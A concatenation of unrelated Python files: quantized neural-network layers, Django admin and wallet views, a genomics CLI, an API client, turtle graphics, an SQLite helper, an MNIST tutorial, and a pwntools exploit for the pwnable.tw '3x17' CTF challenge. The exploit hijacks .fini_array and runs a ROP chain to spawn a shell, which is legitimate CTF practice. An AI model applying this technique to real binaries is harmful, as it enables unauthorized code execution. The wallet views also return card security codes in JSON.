        self.weights = np.reshape(self.weights, (self.F2, 16))
        # fetch quantization scales and fold them into one division factor
        self.input_scale = convert.ste_quant(net, "quant3")
        self.output_scale = convert.ste_quant(net, "quant4")
        self.factor = convert.div_factor(self.input_scale, self.weight_scale, self.output_scale)

    def num_params(self):
        """Number of stored parameters: weights plus the single scalar factor."""
        return reduce(mul, self.weights.shape) + 1

    def mem_size(self):
        """Bytes in memory: 1 B per weight plus 4 B for the scalar factor."""
        return reduce(mul, self.weights.shape) + 4

    def __call__(self, x):
        """Apply the depthwise temporal convolution and rescale the result."""
        assert x.shape == self.input_shape, "shape was {}".format(x.shape)
        y = F.depthwise_conv_time(x, self.weights)
        y = F.apply_factor_offset(y, self.factor, clip_balanced=self.clip_balanced)
        return y
class Layer4(Layer):
    """
    Convolution(1x1) + BN + ReLU + Pool

    Quantized pointwise (1x1) convolution followed by BN, ReLU and a 1x8
    pooling; `reorder_bn` selects the order of those post-ops.
    """
    def __init__(self, net, T, F2, reorder_bn=True, clip_balanced=True, **params):
        self.name = "Layer 4: Point Convolution + Batch Norm + ReLU + Pooling"
        self.T = T
        self.F2 = F2
        self.input_shape = ((F2, T // 8))
        self.output_shape = ((F2, T // 64))
        self.clip_balanced = clip_balanced
        # When True, ReLU + pool run before the BN requantization (see __call__).
        self.reorder_bn = reorder_bn
        # fetch weights
        self.weights, self.weight_scale = convert.inq_conv2d(net, "sep_conv2")
        assert self.weights.shape == (self.F2, self.F2, 1, 1)
        self.weights = np.reshape(self.weights, (self.F2, self.F2))
        # fetch batch norm offset and scale
        self.input_scale = convert.ste_quant(net, "quant4")
        self.output_scale = convert.ste_quant(net, "quant5")
        self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm3")
        # pool=8 folds the 1x8 pooling into the requantization factor/bias.
        self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
                                                               self.output_scale, self.bn_scale,
                                                               self.bn_offset, pool=8)

    def num_params(self):
        """Number of stored parameters: weights plus folded BN factor and bias."""
        count = reduce(mul, self.weights.shape)
        count += reduce(mul, self.factor.shape)
        count += reduce(mul, self.bias.shape)
        return count

    def mem_size(self):
        """Bytes in memory: 1 B per weight, 4 B per factor/bias entry."""
        count = reduce(mul, self.weights.shape)
        count += 4 * reduce(mul, self.factor.shape)
        count += 4 * reduce(mul, self.bias.shape)
        return count

    def __call__(self, x):
        """Pointwise conv, then BN/ReLU/pool in one of two equivalent orders."""
        assert x.shape == self.input_shape, "shape was {}".format(x.shape)
        y = F.pointwise_conv(x, self.weights)
        if self.reorder_bn:
            # ReLU and pool first, then fold in factor and bias.
            y = F.relu(y, -(self.bias // 8))
            y = F.pool(y, (1, 8))
            y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
        else:
            # Requantize first (factor/bias prescaled by the pool width), then
            # ReLU at zero and average-pool.
            y = F.apply_factor_offset(y, self.factor // 8, self.bias // 8,
                                      clip_balanced=self.clip_balanced)
            y = F.relu(y, (self.bias) * 0)
            y = F.pool(y, (1, 8)) // 8
        return y
class Layer5(Layer):
    """
    Linear Layer

    Flattens the (F2, T // 64) feature map and applies the final quantized
    fully connected classifier over N output classes.
    """
    def __init__(self, net, T, F2, N, clip_balanced=True, **params):
        self.name = "Layer 5: Linear Layer"
        self.T = T
        self.F2 = F2
        self.N = N
        self.flatten_dim = self.F2 * (self.T // 64)
        self.input_shape = ((F2, T // 64))
        self.output_shape = ((N, ))
        self.clip_balanced = clip_balanced
        # fetch weights
        self.weights, self.bias, self.weight_scale = convert.inq_linear(net, "fc")
        assert self.weights.shape == (self.N, self.flatten_dim)
        self.input_scale = convert.ste_quant(net, "quant5")
        self.output_scale = convert.ste_quant(net, "quant6")
        self.factor = convert.div_factor(self.input_scale, self.weight_scale, self.output_scale)

    def num_params(self):
        """Number of stored parameters: weights plus bias entries."""
        count = reduce(mul, self.weights.shape)
        count += reduce(mul, self.bias.shape)
        return count

    def mem_size(self):
        # NOTE(review): counts 1 B per weight AND per bias entry; the other
        # layers budget 4 B per bias/factor entry -- confirm this is intended.
        return self.num_params()

    def __call__(self, x):
        """Flatten the input, apply the linear layer and requantize."""
        assert x.shape == self.input_shape, "shape was {}".format(x.shape)
        x = x.ravel()
        y = F.linear(x, self.weights, self.bias)
        y = F.apply_factor_offset(y, self.factor, clip_balanced=self.clip_balanced)
        return y
|
# Default name of the YAML configuration file the application looks for.
DEFAULT_CONFIG_FILENAME = "art.yaml"
|
from django.contrib import admin
from app1.models import OtherUser, Category, Item, ItemImageAndVideos, Offers, Searches, Message, Notifications, ShipmentDetails, ContactUs

# Register every app1 model with the default admin site (same order as before).
for _model in (
    OtherUser,
    Category,
    Item,
    ItemImageAndVideos,
    Offers,
    Searches,
    Message,
    Notifications,
    ShipmentDetails,
    ContactUs,
):
    admin.site.register(_model)
|
#!/usr/bin/python3
'''
Author : Sonal Rashmi
Date : 16/07/2020
Description : IPD Command Line Interface with two subparser long and short read.
'''
import argparse
import os
import sys
from commandlineparser import *
from ipdshortread import *
from ipdlongread import *
import pathlib
#Directory and file check
def file_choices(choices, fname):
    """Validate that *fname* carries one of the allowed extensions.

    Accepts the name when it literally ends with one of *choices*, or when its
    full lower-cased suffix chain (e.g. ".fastq.gz") matches an entry exactly.

    Args:
        choices: acceptable extensions (lower-case, with leading dot).
        fname: file name given on the command line.

    Returns:
        The unchanged file name when valid.

    Raises:
        argparse.ArgumentTypeError: when no extension matches.

    Fix: a stray debug ``print(ext)`` used to leak to stdout before raising.
    """
    ext = ''.join(pathlib.Path(fname).suffixes).lower()
    if ext in choices or any(fname.endswith(c) for c in choices):
        return fname
    raise argparse.ArgumentTypeError('File must have proper extension')
def dir_path(path):
    """Return *path* unchanged when it names an existing directory.

    Raises:
        NotADirectoryError: when the path is not an existing directory.
    """
    if not os.path.isdir(path):
        raise NotADirectoryError(path)
    return path
#define parser and subparsers
def main():
    """Parse the CLI (subcommands ``long`` / ``short``) and run the IPD pipeline."""
    # Options shared by both subcommands.
    parent_parser = argparse.ArgumentParser(add_help=False)
    parent_parser.add_argument('-p',dest='prefix',type=str,required=True,help="set project name")
    parent_parser.add_argument('-t',dest='thread',type=int,default=4,required=False,help="set threads (default = 4)")
    parent_parser.add_argument('-m',dest='molecular_type',type=str,choices=['dna','rna'],required=True,help="set molecular type (DNA or RNA)")
    parent_parser.add_argument('-o',dest='outdir',type= lambda path:dir_path(path),required=True,default=os.getcwd(),help="set Output Directory")
    parser = argparse.ArgumentParser(add_help=False)
    subparsers = parser.add_subparsers(dest='parser_name')
    # subcommand long parser (single FASTQ file)
    parser_SingleEndSample = subparsers.add_parser('long', parents = [parent_parser])
    parser_SingleEndSample.add_argument('-i',dest='input_file',required=True,type=lambda s:file_choices((".fastq",".fastq.gz",".fq.gz",".fq"),s),help="Fastq file (With Complete Path)")
    # subcommand short parser (one or two FASTQ files)
    parser_PairedEndSample = subparsers.add_parser('short', parents = [parent_parser])
    parser_PairedEndSample.add_argument('-i',dest='input_files',nargs='+',required=True,type=lambda s:file_choices((".fastq",".fastq.gz",".fq.gz",".fq"),s),help="Fastq file/files (With Complete Path)")
    args = parser.parse_args()
    if len(sys.argv) == 1:
        # Invoked without any arguments: show usage and quit.
        parser.print_help()
        sys.exit()
    else:
        if args.parser_name == "long":
            # Long reads are always single-ended.
            runmode="SingleEndSample"
            sampleinfo=None
            fastq2 = None
            return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_file, fastq2]
            Parser=CommandLineInterfaceParser(return_list)
            maplist=Parser.map_single_end_sample()
            for inmap in maplist:
                try:
                    i=IPDLongRead(inmap)
                except TypeError:
                    # Malformed mapping entry: show usage and stop.
                    parser.print_help()
                    #print(inmap)
                    sys.exit(0)
        elif args.parser_name == "short":
            # One file -> single-end run, two files -> paired-end run.
            input_file_len=len(args.input_files)
            if input_file_len == 1:
                runmode="SingleEndSample"
                sampleinfo=None
                fastq2 = None
                return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_files[0], fastq2]
                Parser=CommandLineInterfaceParser(return_list)
                maplist=Parser.map_single_end_sample()
                for inmap in maplist:
                    try:
                        i=IPDShortRead(inmap)
                    except TypeError:
                        parser.print_help()
                        #print(inmap)
                        sys.exit(0)
            elif input_file_len == 2:
                runmode="PairedEndSample"
                sampleinfo = None
                return_list=[runmode, args.outdir, args.prefix, args.molecular_type, args.thread, sampleinfo, args.input_files[0], args.input_files[1]]
                Parser=CommandLineInterfaceParser(return_list)
                maplist=Parser.map_paired_sample()
                for inmap in maplist:
                    try:
                        i=IPDShortRead(inmap)
                    except TypeError:
                        parser.print_help()
                        #print(inmap)
                        sys.exit(0)
            else:
                # More than two FASTQ files is not supported.
                print("Invalid Input")
                sys.exit()
        else:
            print("Invalid Option")
            sys.exit()
# Run the CLI when executed as a script.
if __name__ =="__main__":
    main()
|
import requests
from urllib.parse import urljoin
class Buyer:
    """Client for the buyer endpoints of the shop web service.

    Every request carries the username in the JSON body and the session token
    in the ``token`` header; server failures are reported as empty values.

    Fix: successful responses used to call ``r.json()`` once per field,
    re-parsing the HTTP body repeatedly; the body is now parsed once.
    """

    def __init__(self, url_prefix):
        # All buyer endpoints live under <url_prefix>/buyer/.
        self.url_prefix = urljoin(url_prefix, "buyer/")

    def getMemberInfo(self, username: str, token: str):
        """Return (name, sex, tele) for *username*, or ("", "", "") on failure."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "getMemberInfo")
        r = requests.get(url, headers=headers, json=json)
        if r.status_code != 200:
            return "", "", ""
        body = r.json()
        return body["name"], body["sex"], body["tele"]

    def editMemberInfo(self, username: str, token: str) -> bool:
        """POST a member-info edit; True iff the server answered 200."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "editMemberInfo")
        r = requests.post(url, headers=headers, json=json)
        return r.status_code == 200

    def getMemberOrder(self, username: str, token: str):
        """Return (orderId, orderDate, orderStatus, productName, productPrice);
        five empty strings on failure."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "getMemberOrder")
        r = requests.get(url, headers=headers, json=json)
        if r.status_code != 200:
            return "", "", "", "", ""
        body = r.json()
        return (body["orderId"], body["orderDate"], body["orderStatus"],
                body["productName"], body["productPrice"])

    def getRefundOrder(self, username: str, token: str):
        """Return (orderId, productName, productPrice); empty strings on failure."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "getRefundOrder")
        r = requests.get(url, headers=headers, json=json)
        if r.status_code != 200:
            return "", "", ""
        body = r.json()
        return body["orderId"], body["productName"], body["productPrice"]

    def getMemberConsignee(self, username: str, token: str) -> str:
        """Return the member's shipping address, or "" on failure."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "getMemberConsignee")
        r = requests.get(url, headers=headers, json=json)
        if r.status_code != 200:
            return ""
        return r.json()["address"]

    def editConsignee(self, username: str, token: str) -> bool:
        """POST a consignee edit; True iff the server answered 200."""
        json = {"username": username}
        headers = {"token": token}
        url = urljoin(self.url_prefix, "editConsignee")
        r = requests.post(url, headers=headers, json=json)
        return r.status_code == 200
|
import json
from datetime import date
from decimal import *
from functools import cmp_to_key
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from .models import Wallet, Card
from django.http import JsonResponse, HttpResponse
# Create your views here.
@login_required
@require_http_methods(["GET"])
def get_wallet_info(request):
    """Return the authenticated user's wallet summary as JSON.

    Fix: the previous ``try/except Exception as err: raise err`` wrapper
    re-raised every exception unchanged, so it was removed; errors still
    propagate to the framework exactly as before.
    """
    wallet = Wallet.objects.get(owner=request.user)
    response_data = {
        'owner': wallet.owner.username,
        'max_limit': str(wallet.get_max_limit()),
        # userLimit is optional; serialize it as an empty string when unset.
        'user_limit': str(wallet.userLimit) if wallet.userLimit else '',
        'balance': str(wallet.get_balance()),
        'available_credit': str(wallet.get_available_credit())
    }
    return JsonResponse(response_data, status=200)
@login_required
@require_http_methods(["GET"])
def get_cards(request):
    """Return the user's cards as JSON, ordered by Card.compare, keyed by number.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    wallet = Wallet.objects.get(owner=request.user)
    cards = sorted(wallet.get_cards(), key=cmp_to_key(Card.compare))
    response_data = {}
    for card in cards:
        response_data[card.number] = {
            # Only the day-of-month of the due date is meaningful.
            'dueDate': card.dueDate.strftime('%d'),
            'validThru': card.validThru.strftime('%m/%y'),
            'name': card.name,
            'secureCode': card.secureCode,
            'creditLimit': str(card.creditLimit),
            'balance': str(card.balance),
            'available_credit': str(card.get_available_credit())
        }
    return JsonResponse(response_data, status=200)
@login_required
@require_http_methods(["POST"])
def add_card(request):
    """Add a card to the user's wallet from POSTed form fields.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    wallet = Wallet.objects.get(owner=request.user)
    wallet.add_card(
        number=request.POST.get('number'),
        # Only the day-of-month matters for the due date; year/month are dummies.
        duedate=date(1900, 1, int(request.POST.get('duedateday'))),
        validthru=date(int(request.POST.get('validthruyear')), int(request.POST.get('validthrumonth')), 1),
        name=request.POST.get('name'),
        securecode=request.POST.get('securecode'),
        creditlimit=Decimal(request.POST.get('creditlimit')),
        balance=Decimal(request.POST.get('balance'))
    )
    return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def rm_card(request):
    """Remove the card identified by the POSTed ``number`` from the wallet.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    wallet = Wallet.objects.get(owner=request.user)
    wallet.rm_card(Card.objects.get(number=request.POST.get('number')))
    return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def add_purchase(request):
    """Record a purchase of the POSTed ``value`` against the user's wallet.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    wallet = Wallet.objects.get(owner=request.user)
    wallet.add_purchase(Decimal(request.POST.get('value')))
    return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def set_limit(request):
    """Set (or clear, when absent/empty) the user-defined wallet limit.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    wallet = Wallet.objects.get(owner=request.user)
    wallet.set_user_limit(Decimal(request.POST.get('userlimit')) if request.POST.get('userlimit') else None)
    return HttpResponse(status=200)
@login_required
@require_http_methods(["POST"])
def release_credit(request):
    """Release the POSTed ``value`` of credit on the card ``cardnumber``.

    Fix: removed the vacuous ``try/except Exception as err: raise err`` wrapper
    (it re-raised unchanged); behavior is identical.
    """
    card = Card.objects.get(number=request.POST.get('cardnumber'))
    card.release_credit(Decimal(request.POST.get('value')))
    return HttpResponse(status=200)
|
import turtle
def draw_triangle(some_turtle):
    """Draw an equilateral triangle with side length 100, walking backwards.

    Fix: the original turned only 60 degrees per side (plus a stray extra
    turn after the loop), which traces half a hexagon and never closes; a
    triangle's exterior turn angle is 120 degrees.
    """
    for _ in range(3):
        some_turtle.backward(100)
        some_turtle.right(120)
def draw_square(some_turtle):
    """Draw a square with side length 100, moving backwards and turning left."""
    sides_drawn = 0
    while sides_drawn < 4:
        some_turtle.backward(100)
        some_turtle.left(90)
        sides_drawn += 1
def draw_art():
    """Open a turtle window and draw a triangle and a square with two turtles."""
    window = turtle.Screen()
    window.bgcolor("yellow")
    # create turtle brad - draws the triangle
    brad = turtle.Turtle()
    brad.shape("turtle")
    brad.color("blue")
    brad.speed(2)
    # range(1, 2) runs exactly once
    for i in range(1,2):
        draw_triangle(brad)
    # brad.right(10)
    # create turtle diva - draws the square
    diva = turtle.Turtle()
    diva.shape("arrow")
    diva.color("green")
    diva.speed(2)
    for i in range(1,2):
        draw_square(diva)
    # Keep the window open until it is clicked.
    window.exitonclick()

draw_art()
|
#!/usr/bin/python
# -*- coding: cp936 -*-
""" clientTradeEventUtility.py
对db中clientTradeEvent表格进行数据处理
"""
import sqlite3
class clientTradeEventUtility:
    """Data-processing helpers for the ``clienttradeevent`` table."""

    def geteffectiveTradeUsersAndDates(self, db_path='C:\sqlite\db\hxdata.db'):
        """Return users with effective trades and their first trade date.

        Args:
            db_path: path of the SQLite database. Defaults to the original
                hard-coded location, so existing callers are unaffected.

        Returns:
            dict mapping stripped ``khcode`` -> earliest ``tradedate``.

        Fix: the query previously had no ORDER BY, so "first trade date"
        depended on table storage order; rows are now read in date order.
        NOTE(review): assumes ``tradedate`` sorts chronologically as text
        (e.g. ISO yyyy-mm-dd) -- confirm the column format.
        """
        first_trade_by_user = {}
        with sqlite3.connect(db_path) as db:
            statement = 'SELECT khcode, tradedate FROM clienttradeevent ORDER BY tradedate'
            for khcode, tradedate in db.execute(statement):
                key = str(khcode).strip()
                # Keep only the first (earliest) date seen per user.
                if key not in first_trade_by_user:
                    first_trade_by_user[key] = tradedate
        return first_trade_by_user
#print(clientTradeEventUtility().geteffectiveTradeUsersAndDates())
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import time
from pwn import *
#context.log_level = 'debug'
# Target binary; all addresses below are absolute (no PIE assumed).
elf = ELF('./3x17')
# Memory locations
fini_array = 0x4b40f0
__libc_csu_fini = 0x402960
elf_main = 0x401b6d
# Scratch address in .bss used to store the "/bin/sh" string.
bin_sh = elf.bss()
# Gadgets
leave_ret = 0x401c4b
ret = 0x401016
pop_rax_ret = 0x41e4af
pop_rdi_ret = 0x401696
pop_rsi_ret = 0x406c30
pop_rdx_ret = 0x446e35
syscall = 0x4022b4
# Byte sequence alias (8 filler bytes)
A8 = 8 * b'A'
def proc_write(proc, addr, data):
    """Drive one round of the target's write primitive: send *addr*, then *data*."""
    exchanges = (
        ('addr:', str(addr).encode()),
        ('data:', data),
    )
    for prompt, payload in exchanges:
        proc.recvuntil(prompt)
        proc.send(payload)
def main():
    """
    Main idea: .fini_array hijacking + ROP

    0. In this challenge, all debugging symbols were not
       compiled into the ELF, so we have to find out the
       address of main() by ourselves.
       The entry point of the program is _start(). In gdb,
       we can run the command `starti` (exectue just 1 instruction
       and break immediately), and then we will be able to
       find out the address of main().
       What _start() does is simply invoke __libc_start_main().
       int __libc_start_main(int (*main)(int, char **, char **), # rdi
                             int argc, # rsi
                             char **ubp_av, # rdx
                             void (*init)(void), # rcx
                             void (*fini)(void), # r8
                             void (*rtld_fini)(void), # r9
                             void (*stack_end)); # $rbp + 16
    1. Hijack .fini_array and create a loop of arbitrary write:
       a) .fini_array[0] = __libc_csu_fini()
       b) .fini_array[1] = main()
       This will cause __libc_csu_fini() -> main() -> __libc_csu_fini() -> main()...
       Don't worry about the stack, it should be large enough :)
       Note: in main(), writing to arbitray memory address
       is allowed only if *0x4b9330 == 1, and since
       *0x4b9330 is a char (1 byte), we can simply let it run
       255 times and it will wrap around.
    2. To break the loop, overwrite .fini_array[0] to
       another function other than __libc_csu_fini().
    3. Stack pivoting:
       a) .fini_array[0 ] = `leave ; ret`
       b) .fini_array[1 ] = `ret`
       c) .fini_array[2:] = rop_chain
       where `leave` = `mov rsp, rbp` ; `pop rbp`

    External Reference:
    ---
    [1] http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
    [2] https://www.mdeditor.tw/pl/pxws
    """
    proc = remote('chall.pwnable.tw', 10105)
    #proc = elf.process()
    #log.debug('You may attatch this process to gdb now.')
    #raw_input()
    # 1. Create a loop of arbitrary write.
    proc_write(proc, fini_array, p64(__libc_csu_fini) + p64(elf_main))
    # 2. Write '/bin/sh\x00' to elf.bss()
    proc_write(proc, bin_sh, b'/bin/sh\x00')
    # 3. Write ROP chain (starting at .fini_array[2])
    payload = p64(pop_rax_ret) # ret
    payload += p64(59) # rax = 59 (execve syscall number on x86-64)
    payload += p64(pop_rdi_ret) # ret
    proc_write(proc, fini_array + 16, payload)
    payload = p64(bin_sh) # rdi = bin_sh
    payload += p64(pop_rsi_ret) # ret
    payload += p64(0) # rsi = 0
    proc_write(proc, fini_array + 40, payload)
    payload = p64(pop_rdx_ret) # ret
    payload += p64(0) # rdx = 0
    payload += p64(syscall) # ret
    proc_write(proc, fini_array + 64, payload)
    # 4. Stack pivot and execute ROP chain
    proc_write(proc, fini_array, p64(leave_ret) + p64(ret))
    proc.interactive()
# Run the exploit when executed as a script.
if __name__ == '__main__':
    main()
|
# Setup
from __future__ import division, print_function, unicode_literals
import pickle
import numpy as np
import os
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_score, recall_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import GridSearchCV
from scipy.ndimage import shift
# to make output stable across runs
def seed_rand(x=42):
    """Seed NumPy's global RNG so runs are reproducible; always returns None."""
    np.random.seed(x)
    return None
# To plot pretty figures
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "/Users/shirelga/liat/dev/fabus"
# NOTE(review): CHAPTER_ID is not referenced by save_fig -- confirm it is used elsewhere.
CHAPTER_ID = "Classification"
def save_fig(fig_id, tight_layout=True):
    """Save the current matplotlib figure to <PROJECT_ROOT_DIR>/<fig_id>.png at 300 dpi."""
    path = os.path.join(PROJECT_ROOT_DIR, fig_id + ".png")
    print("Saving figure", fig_id)
    if tight_layout:
        plt.tight_layout()
    plt.savefig(path, format='png', dpi=300)
# MNIST
def sort_by_target(mnist):
    """Sort the MNIST train (first 60000) and test splits by label, in place.

    fetch_openml() returns the dataset unsorted; this restores the ordering of
    the original MNIST distribution.
    """
    # Argsort each split by (label, original index); column 1 keeps the index.
    reorder_train = np.array(sorted([(target, i) for i, target in enumerate(mnist.target[:60000])]))[:, 1]
    reorder_test = np.array(sorted([(target, i) for i, target in enumerate(mnist.target[60000:])]))[:, 1]
    mnist.data[:60000] = mnist.data[reorder_train]
    mnist.target[:60000] = mnist.target[reorder_train]
    mnist.data[60000:] = mnist.data[reorder_test + 60000]
    mnist.target[60000:] = mnist.target[reorder_test + 60000]
def fetch_mnist_data():
    """Download MNIST via fetch_openml, falling back to fetch_mldata on old sklearn."""
    try:
        from sklearn.datasets import fetch_openml
        mnist = fetch_openml('mnist_784', version=1, cache=True)
        mnist.target = mnist.target.astype(np.int8) # fetch_openml() returns targets as strings
        sort_by_target(mnist) # fetch_openml() returns an unsorted dataset
    except ImportError:
        # Older scikit-learn has no fetch_openml.
        from sklearn.datasets import fetch_mldata
        mnist = fetch_mldata('MNIST original')
    return mnist
# Load the dataset and inspect its shape.
mnist = fetch_mnist_data()
print("sorted MNIST dataset: \n", mnist["data"], mnist["target"])
print("\n")
print("(data, target) shape: \n", mnist.data.shape)
print("\n")
X, y = mnist["data"], mnist["target"]
print("X - data shape: \n", X.shape)
print("\n")
print("y - target key - labels shape: \n", y.shape)
print("\n")
print("each image has 28*28 pixels=", 28 * 28)
print("features\n\n")
# Display one sample digit as a 28x28 image.
some_digit = X[36000]
some_digit_image = some_digit.reshape(28, 28)
plt.imshow(some_digit_image, cmap=mpl.cm.binary, interpolation="nearest")
plt.axis("off")
#plt.show()
print("Label of some digit\n", y[36000])
# Split data to train and test (MNIST's canonical 60000/10000 split)
X_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]
# Shuffle the training set so cross-validation folds are similar.
shuffle_index = np.random.permutation(60000)
X_train, y_train = X_train[shuffle_index], y_train[shuffle_index]
# Binary classifier, simplify the problem: "is this digit a 5?"
y_train_5 = (y_train == 5)
y_test_5 = (y_test == 5)
# Train SGDClassifier on the whole training set
sgd_clf = SGDClassifier(max_iter=5, tol=-np.infty, random_state=42)
sgd_clf.fit(X_train, y_train_5)
print("is the model predicted right?True or False:\n", sgd_clf.predict([some_digit]))
print("\n")
# Performance measures - evaluating a classifier
# Measuring Accuracy using cross-Validation
cross_acc_5 = cross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring="accuracy")
print("Accuracy:\n", cross_acc_5)
print("\n")
# Measuring Accuracy using Confusion Matrix
# First we need set of predictions
y_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)
# Passed target classes and the predicted classes to the CM
cm = confusion_matrix(y_train_5, y_train_pred)
print("Confusion matrix: \n", cm)
print("\n")
# Precision: accuracy of the positive predictions
precision_ = precision_score(y_train_5, y_train_pred)
print("This is the precision:\n", precision_)
print("\n")
# Recall (TPR)
recall_ = recall_score(y_train_5, y_train_pred)
print("This is the recall:\n", recall_)
print("\n")
# f1 score is the harmonic mean of precision and recall:
# TP/(TP+((FN+FP)/2))
f_one_score = f1_score(y_train_5, y_train_pred)
print("This is the f1 score:\n", f_one_score)
print("\n")
# decision_function() returns a score for each instance
y_scores = sgd_clf.decision_function([some_digit])
print("Score for each instance:", y_scores)
# make predictions based on those decision_function() scores
# using any threshold
treshold = 0
y_some_digit_pred = (y_scores > treshold)
print("Predictions using zero treshold:", y_some_digit_pred)
# decide which threshold to use
# first we get scores of all instances in the training set using cross validation predict
y_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method="decision_function")
print("Dimention of the y_score generated by cross_val_predict():\n", y_scores.shape
)
print("\n")
# Workaround for sklearn issue 9589: some versions return a 2D score array.
if y_scores.ndim == 2:
    y_scores = y_scores[:, 1]
print("Dimention with hack around issue 9589 in sklearn shape:\n", y_scores.shape)
print("\n")
# now with the scores we can compute precision and recall for every threshold
precisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)
def plot_precision_recall_vs_threshold(precisions, recalls, thresholds):
    """Plot precision and recall as functions of the decision threshold."""
    # precision_recall_curve returns one more precision/recall entry than
    # thresholds, hence the [:-1] slices.
    plt.plot(thresholds, precisions[:-1], "b--", label="Precision", linewidth=2)
    plt.plot(thresholds, recalls[:-1], "g-", label="Recall", linewidth=2)
    plt.xlabel("Threshold", fontsize=16)
    plt.legend(loc="upper left", fontsize=16)
    plt.ylim([0, 1])
# Visualize the precision/recall trade-off over thresholds.
plt.figure(figsize=(8, 4))
plot_precision_recall_vs_threshold(precisions, recalls, thresholds)
plt.xlim([-700000, 700000])
#save_fig("precision_recall_vs_threshold_plot")
#plt.show()
# Pick a threshold of 70000 to aim for higher precision.
y_train_pred_90 = (y_scores > 70000)
precision_score_90 = precision_score(y_train_5, y_train_pred_90)
print("Precision for 70000 threshold:", precision_score_90)
recall_score_90acc = recall_score(y_train_5, y_train_pred_90)
print("Recall for 70000 threshold:", recall_score_90acc)
def plot_precision_vs_recall(precisions, recalls):
    """Plot precision directly against recall on the unit square."""
    plt.plot(recalls, precisions, "b-", linewidth=2)
    plt.xlabel("Recall", fontsize=16)
    plt.ylabel("Precision", fontsize=16)
    plt.axis([0, 1, 0, 1])
# Precision-versus-recall curve.
plt.figure(figsize=(8, 6))
plot_precision_vs_recall(precisions, recalls)
#save_fig("precision_vs_recall_plot")
#plt.show()
# ROC curves
# computing FPR and TPR for various threshold values
fpr, tpr, thresholds = roc_curve(y_train_5, y_scores)
# plot FPR against the TPR
def plot_roc_curve(fpr, tpr, label=None):
    """Plot a ROC curve plus the diagonal of a purely random classifier."""
    plt.plot(fpr, tpr, linewidth=2, label=label)
    plt.plot([0, 1], [0, 1], 'k--')
    plt.axis([0, 1, 0, 1])
    plt.xlabel('False Positive Rate', fontsize=16)
    plt.ylabel('True Positive Rate', fontsize=16)
plt.figure(figsize=(8, 6))
plot_roc_curve(fpr, tpr)
#save_fig("roc_curve_plot")
#plt.show()
# A perfect classifier will have a ROC AUC equal to 1, whereas a purely random classifier will have 0.5
roc_auc = roc_auc_score(y_train_5, y_scores)
print("This is roc curve auc for SGD classifier:", roc_auc)
# train RF and compare its ROC curve against the SGD classifier
forest_clf = RandomForestClassifier(n_estimators=10, random_state=42)
y_probas_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3, method="predict_proba")
# Use the probability of the positive class as the score.
y_scores_forest = y_probas_forest[:, 1]
fpr_forest, tpr_forest, threshold_forest = roc_curve(y_train_5, y_scores_forest)
plt.plot(fpr, tpr, "b:", label="SGD")
plot_roc_curve(fpr_forest, tpr_forest, "Random Forest")
plt.legend(loc="lower right")
#plt.show()
roc_auc_RFclassifier = roc_auc_score(y_train_5, y_scores_forest)
print("This is roc curve auc for Random Forest classifier:", roc_auc_RFclassifier)
# measuring the precision and recall, f1 also
y_train_pred_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3)
# NOTE(review): the variable/print say "Accuracy" but this is precision_score.
accuracy_random_forest = precision_score(y_train_5, y_train_pred_forest)
print("Accuracy using Random Forest:\n", accuracy_random_forest)
recall_random_forest = recall_score(y_train_5, y_train_pred_forest)
print("Recall using Random Forest:\n", recall_random_forest)
f1 = f1_score(y_train_5, y_train_pred_forest)
print('Random forest f1 score:\n', f1)
# Multi class classification
# OvA: sklearn trains one-versus-all automatically for multiclass targets
sgd_clf.fit(X_train, y_train)
print(sgd_clf.predict([some_digit]))
some_digit_score = sgd_clf.decision_function([some_digit])
print(some_digit_score)
print("The higher score for OvA is indeed the one corresponding to class:\n", np.argmax(some_digit_score))
print("SGD classes:\n", sgd_clf.classes_)
print("The sgd_clf.classes_[5]", sgd_clf.classes_[5])
# OvO: one binary classifier per pair of classes
